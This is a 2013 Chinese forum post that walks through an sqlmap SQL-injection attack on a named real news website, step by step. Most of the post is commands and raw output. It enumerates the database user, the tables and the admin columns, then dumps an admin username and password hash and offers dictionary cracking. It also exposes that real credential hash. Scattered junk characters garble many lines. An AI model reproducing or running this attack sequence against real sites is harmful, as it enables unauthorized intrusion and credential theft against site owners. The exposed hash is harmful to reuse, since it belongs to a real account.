找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2422|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- s$ M9 H* y4 a* F
ms "Mysql" --current-user       /*  注解:获取当前用户名称6 g0 j  m) Y1 ^! B1 Q/ O
    sqlmap/0.9 - automatic SQL injection and database takeover tool# N) h3 }8 q+ T" B* ]) m/ A
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    3 W7 A  _, B6 `[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% b( O  _: O* l2 ]  F0 i
    session file3 |/ B) h# v: R- Y
    [16:53:54] [INFO] resuming injection data from session file3 N) ^; O3 ?6 X4 |& `
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    % P) F* y% a+ T- S+ b* v[16:53:54] [INFO] testing connection to the target url
    ! v# m. p/ b. h1 `1 @' vsqlmap identified the following injection points with a total of 0 HTTP(s) reque  k! w  q) A! C5 A# D$ {
    sts:, F/ P5 w+ y8 C# e; k) N
    ---
    * F! F1 ?" e* e: q4 BPlace: GET9 p- P# h; v5 t# k3 `9 T
    Parameter: id  G7 H7 m  k2 w+ A" H8 ], ^: ~
        Type: boolean-based blind
    + v* r7 ~: M: a  R" i    Title: AND boolean-based blind - WHERE or HAVING clause
    % N: x2 P  c: b# P    Payload: id=276 AND 799=799
    7 v% v, @( D, K9 N! W0 ^    Type: error-based, V! p0 W0 w. C$ o
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' Y0 e& x0 C6 @  ~  B! X1 C" E# v
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 J0 ?* a* i) i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) b* y4 f$ ~- u+ @. W),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    + H# {1 H: c# y8 `    Type: UNION query
      |  ~( O% S% |: N1 D2 ?    Title: MySQL UNION query (NULL) - 1 to 10 columns- K% x0 Z- C# U# U8 I0 n' D2 ]/ R
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    3 L' N1 `( O* l* v9 ^4 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # A  B; l4 h6 b6 wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & C( O8 s2 U( `/ z; y) j6 v    Type: AND/OR time-based blind0 m' i9 c. u7 P! d1 ]1 |
        Title: MySQL > 5.0.11 AND time-based blind5 j7 q. V# u" k. z
        Payload: id=276 AND SLEEP(5)( X& b# @8 |3 O$ b) l2 F  B" ]" b
    ---
    9 l* g+ I6 w0 A[16:53:55] [INFO] the back-end DBMS is MySQL
    2 l# q3 b6 I, C, B7 Sweb server operating system: Windows
    6 C/ L2 l2 |# q% s  @! J& sweb application technology: Apache 2.2.11, PHP 5.3.0
    & }# }" @$ `3 u9 ^) r! cback-end DBMS: MySQL 5.0+ A6 v/ o$ A+ |' N0 @
    [16:53:55] [INFO] fetching current user
    / R/ `/ ^  q# H7 [7 xcurrent user:    'root@localhost'   . c, B5 _0 g" e+ X
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    : x% b7 `' t5 g. g/ ctput\www.wepost.com.hk'
  • shutting down at: 16:53:58+ P/ R% s' c+ e# C& P7 f

    7 E& l# S3 J+ e0 K4 p( a) TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    + Y7 a% {, w* j& ]8 Q7 u! [2 x3 t) ems "Mysql" --current-db                  /*当前数据库* s! q0 A/ [7 r
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ( R2 _5 a) ^- E! |    http://sqlmap.sourceforge.net
  • starting at: 16:54:167 t- X9 e% [, X, |, v
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ |2 {( s# k( S& d( B; z
    session file5 [6 r. ?  z- f0 `! q# w
    [16:54:16] [INFO] resuming injection data from session file" X* }# c$ \* m( o" L2 h% s
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    5 Z! L: O4 e8 C6 Z6 t7 u' Z[16:54:16] [INFO] testing connection to the target url3 G1 B+ Q- I5 y0 g8 j9 B0 V( h
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    * J- j' q' Y' t/ K" [6 Ists:
    ; o2 n$ l% K% Z% `" y---, W- b3 a1 H9 c' u% r3 E
    Place: GET7 t- |% k# R1 F3 G
    Parameter: id
    : r0 ?* w8 C8 J& D$ D    Type: boolean-based blind
    8 }0 A7 W5 D0 R  C    Title: AND boolean-based blind - WHERE or HAVING clause: T% J! H  O4 N6 Q- j- V7 T
        Payload: id=276 AND 799=799
    7 k$ v% t) i) N    Type: error-based5 H# o/ i. w4 l; D' g: c, F
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 p" _4 [) N4 l
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. A. ^2 @4 N: d# i: k' X: m" ?
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    2 t, f7 o* c, r: y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 r; }) \) F/ `
        Type: UNION query
    5 m2 y3 x- s( p7 E+ d# [    Title: MySQL UNION query (NULL) - 1 to 10 columns
    & n6 X& q9 m+ z/ C; X! R    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR7 ~0 Z6 a, i/ a+ V# @  C, G
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ H' w; D2 ]! @- J
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 Y: h  t" M+ |
        Type: AND/OR time-based blind+ c3 k/ C$ D! E" F. ?# f- a
        Title: MySQL > 5.0.11 AND time-based blind+ N  A5 v9 b8 k; Z' y
        Payload: id=276 AND SLEEP(5)0 t: T" X2 `4 P
    ---( @4 }: D' `& B: L  y( ?
    [16:54:17] [INFO] the back-end DBMS is MySQL
    9 M$ y+ b' y9 f9 D8 D4 y2 l5 hweb server operating system: Windows  q4 A  {" Z5 `2 M$ x3 \3 \
    web application technology: Apache 2.2.11, PHP 5.3.0
    - g3 `- R  Z) k# F5 [2 ?back-end DBMS: MySQL 5.07 S8 J8 T+ ]. C
    [16:54:17] [INFO] fetching current database
    1 b) M6 ^& n7 T  N- \) L+ K! Y  B8 icurrent database:    'wepost'( g& |# _  A7 E$ ?- _: v% ^
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    3 Q8 C; |/ A# F6 Y# c# ntput\www.wepost.com.hk'
  • shutting down at: 16:54:18" Z, B6 e$ Q+ V  L* }9 p8 L
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    . N3 h; r. Q. n8 r2 `& ^ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    , j7 H) e: M- U9 R0 G    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ) n  t- X- {5 V    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    # {. R) P* G$ n1 f, E& `, n0 n[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% q( S0 @+ C+ J
    session file
    # {. l/ w0 G6 d5 ]& m[16:55:25] [INFO] resuming injection data from session file9 F# v0 n1 b7 S8 ^6 @
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    . l# g9 w2 x& p2 [" S[16:55:25] [INFO] testing connection to the target url. X9 e+ I; {* T
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    * t7 P* U6 l/ jsts:' |4 N, B3 B2 r8 M& n7 C
    ---- |( ~" ~; y% j7 o
    Place: GET  [6 y. l# H$ E1 F9 Q1 E
    Parameter: id
      M9 V2 e- w/ R0 ^3 h7 c  u    Type: boolean-based blind
    ; ^  A+ x" f  c+ G9 X8 A4 i    Title: AND boolean-based blind - WHERE or HAVING clause
    ' j3 u$ O4 V( i3 e    Payload: id=276 AND 799=7997 o0 x7 f% v" R' Z, H% B. g
        Type: error-based% Z/ b, V3 @. Y! U+ o* h( A
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 h+ j6 N1 T+ L, W; S
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 x, u9 t* A8 b: w' M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    - d5 B0 U  Y9 C4 `5 J% i9 A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ v5 ~( o5 W/ o
        Type: UNION query+ Q! y$ S" _0 [. e, y, n1 ^
        Title: MySQL UNION query (NULL) - 1 to 10 columns4 e4 {, H3 o& S  }" ^; n
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    0 @5 e( A6 C/ C6 O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* w2 u( u: ~0 K3 I1 X: e) O
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, @, b2 a  c2 @6 b4 S
        Type: AND/OR time-based blind( Q" X' V: B/ Z! w" _
        Title: MySQL > 5.0.11 AND time-based blind
      @7 v; A" K  e    Payload: id=276 AND SLEEP(5)
    * W& j" l5 W# [! r---
    : Q5 [+ P2 R( `) q[16:55:26] [INFO] the back-end DBMS is MySQL
    ( K3 E& l! q- o* F, C" Eweb server operating system: Windows
    7 V' w& F; G+ `web application technology: Apache 2.2.11, PHP 5.3.0
    & Z9 @& k+ G9 y8 Zback-end DBMS: MySQL 5.0
      H& |" q& l# D3 k, X[16:55:26] [INFO] fetching tables for database 'wepost'# n1 p( R$ ^& M
    [16:55:27] [INFO] the SQL query used returns 6 entries
    + E. r% S% d, n/ L7 ]5 s& Y6 wDatabase: wepost- D- E( ^% [" X, s
    [6 tables]1 B; O7 [6 l3 ^9 a7 j' @( X
    +-------------+
    4 w: M8 D( Z! U  }( ~| admin       |4 i* L3 D% Q+ e
    | article     |) y2 W$ J! x/ {7 s& o  W6 x& N
    | contributor |
    2 D; w! T5 A) v9 {  D) q| idea        |) A: a, [! H  p7 n( @
    | image       |" M. w; b0 ^. h; U* T7 l5 Y5 T: I+ s
    | issue       |
    $ Z5 x( K: N1 B) M+-------------+
    ' y8 [9 E& L, P: d% U[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    / O, S1 @" a+ ~' Z0 otput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    * _6 s6 `# n" g: n3 W; O( v* c7 H6 H8 P0 w: C4 h9 U, {; @7 L
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# o, H3 \6 \  L9 z/ `
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    , w3 f8 A" Q# `& I7 I  q    sqlmap/0.9 - automatic SQL injection and database takeover tool% g" q! s* ^, t& C. Y
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    # G4 m+ I" S) ?7 }$ h+ Esqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 x- a. L; g! X) q5 S: d/ ?: Bsts:7 f: H4 L* C8 ^: z, x7 ?. K" l8 J
    ---
    2 A' n. N/ A$ v. {3 q  `' iPlace: GET8 L8 F7 ~( F7 r/ d. M9 P- v
    Parameter: id
    " E( N4 m5 D9 K    Type: boolean-based blind
    ) S0 P. H! L' B, [  |    Title: AND boolean-based blind - WHERE or HAVING clause# K* r) b" C$ h- _
        Payload: id=276 AND 799=7991 @& v. b* M7 K: R' z3 Y! e
        Type: error-based0 V  k+ ?  i$ g1 g) T# o
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, J, \9 l) i0 c9 c$ ^
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ( A, \% f( m5 x- Y) n  Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' k; t& a7 O, j  n, s# O" w
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 r  ~, R! G" A. K) ?! T* Z
        Type: UNION query2 |4 |  O5 z2 H/ e0 k  |+ N9 y
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    + L, O+ \: v; g% x3 Y    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. Y' N" [  A: \# V0 h
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : Q% ~4 r+ `  J7 ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    # j, p2 ]4 }) G4 M4 v* S- K- ]    Type: AND/OR time-based blind* d* ?4 P1 p! ?4 P: ]9 A
        Title: MySQL > 5.0.11 AND time-based blind
    " c7 D/ s0 W. A5 R3 L( h    Payload: id=276 AND SLEEP(5)* w7 x7 l" w7 x: g5 L$ A
    ---
    ! X, |8 _4 u. w+ D1 oweb server operating system: Windows
      q4 n5 a0 l9 e# R& j. Y! k( E8 Wweb application technology: Apache 2.2.11, PHP 5.3.05 M7 D3 L+ u. O; d( M
    back-end DBMS: MySQL 5.0
    6 ^9 p# Y& z* P: v1 g6 U5 [* v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    - y; u! t/ z# _8 J0 Dssion': wepost, wepost
    ( Y- c* q: v. k9 pDatabase: wepost
    7 \) L4 y* ^# d- |& J0 xTable: admin
    % c2 J/ {% K: `- D3 t, M[4 columns]
    / n; ^* ?3 q; E% H0 S- ~+----------+-------------+! S) u5 F  n' ?
    | Column   | Type        |+ b/ U$ V& T8 Q8 l; M5 b
    +----------+-------------+
    9 `$ i* m- e1 j0 Q! f0 |5 V5 T4 G: U" g| id       | int(11)     |$ D& o. @& ]' b8 J  V$ ?9 p
    | password | varchar(32) |  P1 |" `1 _/ u& C' D" ^
    | type     | varchar(10) |' c& f6 d% H# e& h7 V, h
    | userid   | varchar(20) |
    # s0 w" P6 m3 N8 a+----------+-------------+$ D/ K- Y* O! z6 N- O/ G
  • shutting down at: 16:56:19
      N5 w% n# ?9 Q5 k4 `
    8 J5 i0 T3 m- h# g& GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    , E; T$ q2 V" K+ s4 Ims "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容$ _/ o( ]7 y' @2 M, _
        sqlmap/0.9 - automatic SQL injection and database takeover tool: e  u* {9 K* r  {1 G
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14: Y/ e7 C  ~, F" _/ z
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / x+ W% Y3 H9 {5 F( a; f2 lsts:" n' `/ h. U+ f/ I# y8 G: c
    ---3 I# o/ T* E; [  L
    Place: GET
      p7 x* l8 I' R4 I0 Z$ f2 NParameter: id9 ?1 |: t4 R6 J3 z7 q
        Type: boolean-based blind
    & Z; ~8 @# m3 ?/ J8 O    Title: AND boolean-based blind - WHERE or HAVING clause7 \. E& y: ], `: ]+ C
        Payload: id=276 AND 799=799
    8 a7 ^! T+ y% S    Type: error-based
    # }5 H3 _5 g6 Y1 W  t8 z4 f    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    + p0 @% j' U6 e, h$ R2 |4 S    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 s3 A5 }+ r# q; a- b* W
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + B' j0 C' A. |+ B) h7 G, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    * d; v# E# m3 o. L0 o9 _3 W: f2 |    Type: UNION query
    7 f$ _- O( S5 {8 \1 s1 o    Title: MySQL UNION query (NULL) - 1 to 10 columns
    8 s/ i" t+ t) z. }- \# T2 Z/ C3 C/ ^    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ) X6 h) D3 Q: c+ {5 o6 \8 q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    + W( G' L8 ]$ T& d! J. UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    9 @' N' R: h2 ~% E0 |; c    Type: AND/OR time-based blind
    + A- ~' g- k& ~: W, o( g, T* p    Title: MySQL > 5.0.11 AND time-based blind# Z1 o# G8 S' ^3 i7 L6 G4 q* D% ^0 {
        Payload: id=276 AND SLEEP(5)" K& g! I- K# g1 P& ^7 C# @
    ---, W8 C5 o) @; T" l+ H3 J6 t- D1 F
    web server operating system: Windows3 ~0 C% w% [0 t- k* t/ T" ~( q+ M
    web application technology: Apache 2.2.11, PHP 5.3.0
    ' b! z0 j& I, D( iback-end DBMS: MySQL 5.0) ~* i& h& p& Y& u( k
    recognized possible password hash values. do you want to use dictionary attack o
    , C) k& Z% C1 B2 `- yn retrieved table items? [Y/n/q] y
    - v& R9 A8 o; N9 a, w0 `what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]+ C5 H0 V+ }% M: e: L$ n
    do you want to use common password suffixes? (slow!) [y/N] y
    0 y5 E# y' y' `- RDatabase: wepost
    & W  I" i, e% {( ?Table: admin
    8 T* E: ?# {* f8 |[1 entry], u1 }/ o& ^$ [3 B
    +----------------------------------+------------+
    # A$ k) d4 O+ Z/ B: Z| password                         | userid     |
    # S, o. a* l  y* K8 H- e+----------------------------------+------------+
    $ @8 r8 @% n, o  g( k9 p| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |% p. S$ k' |* d7 X6 G$ v8 o" k
    +----------------------------------+------------+
    . E- h% a/ [0 [- W) P0 b% _) I0 w& G
  • shutting down at: 16:58:14% \6 }# F, L( r' W7 n# H

    " O7 @) j3 C) e3 l' z  fD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表